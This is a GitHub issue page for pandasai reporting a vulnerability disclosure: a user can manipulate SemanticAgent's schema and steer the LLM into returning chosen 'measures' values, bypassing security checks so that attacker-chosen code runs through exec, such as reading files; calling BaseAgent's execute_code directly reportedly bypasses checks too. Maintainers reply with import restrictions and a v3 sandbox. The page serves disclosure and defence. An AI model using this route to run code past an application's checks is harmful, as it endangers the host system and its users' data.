-
Notifications
You must be signed in to change notification settings - Fork 1.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SemanticAgent can trigger RCE through conversation #1367
Comments
Hi @BACMiao! I'm here to help you with any bugs, questions, or contributions you have. The
To mitigate this risk, it is crucial to implement proper input validation and sanitization in the |
The first PoC is not triggered through the
|
Hey @dosu bot It looks like this issue got fixed with some import restrictions that were put in place in the latest code. Can you confirm that? Is it possible still to cause RCE after these changes? |
Yes, the latest code changes in the
These changes collectively enhance the security of the |
Hey @sei-vsarvepalli, 3.0 main security feature is the possibility of executing the code in a sandbox: you can check it out here (https://docs.getpanda.ai/v3/privacy-security). Also, the core library has now a semantic data layer for both semantic enhancement (https://docs.getpanda.ai/v3/semantic-layer) and data transformations (https://docs.getpanda.ai/v3/transformations) |
System Info
OS version: macOS 14.3.1
Python version: Python 3.12.4
The current version of pandasai being used: v2.2.14
🐛 Describe the bug
Hi, Team
While using the
SemanticAgent
, I discovered that users can bypass existing security checks by manipulating the providedschema
and forcing the system to return specificmeasures
values during conversations with the LLM, potentially triggering the execution of risky code throughexec
.PoC: (from the example code)
Log:
![image](https://private-user-images.githubusercontent.com/15136865/369874528-b199dc5b-be6e-4fc4-8e5a-42743c1c0cbd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzg5NDY5NDQsIm5iZiI6MTczODk0NjY0NCwicGF0aCI6Ii8xNTEzNjg2NS8zNjk4NzQ1MjgtYjE5OWRjNWItYmU2ZS00ZmM0LThlNWEtNDI3NDNjMWMwY2JkLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMDclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjA3VDE2NDQwNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTU0YTE1MTk5NDc2M2Q4ZTc4ZTQ2ZTFmNDhjM2I3OTg1ZWQ1MTViMDhlMzNlZDI2YWNmODliNGM3NWE3ZmVjM2YmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.5jx2-L71VhC8ONMo3PvWMHCfNuxqLid5Wit24ScpVKU)
Execute arbitrary instructions through code (e.g. read file contents)
This is the log information printed by pandasai.log
![image](https://private-user-images.githubusercontent.com/15136865/370110562-6e6a7f91-946f-485c-88b0-b1afeb2def91.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mzg5NDY5NDQsIm5iZiI6MTczODk0NjY0NCwicGF0aCI6Ii8xNTEzNjg2NS8zNzAxMTA1NjItNmU2YTdmOTEtOTQ2Zi00ODVjLTg4YjAtYjFhZmViMmRlZjkxLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAyMDclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMjA3VDE2NDQwNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTVkNmU0ZDhhNjk0OWUwY2M5ZTA1YWIxZjI1ODQ4NThmNzFlZTQxMTljNWFkOWIwMDFjNDc2ZmZlM2VlMzg3NjAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.aZoG8zVSDFV_nykfX63dYFqbS8ekqaLopJuXYvszJTQ)
Additionally, I found that directly using the
execute_code
method from theBaseAgent
can also bypass some security checks.PoC:
The text was updated successfully, but these errors were encountered: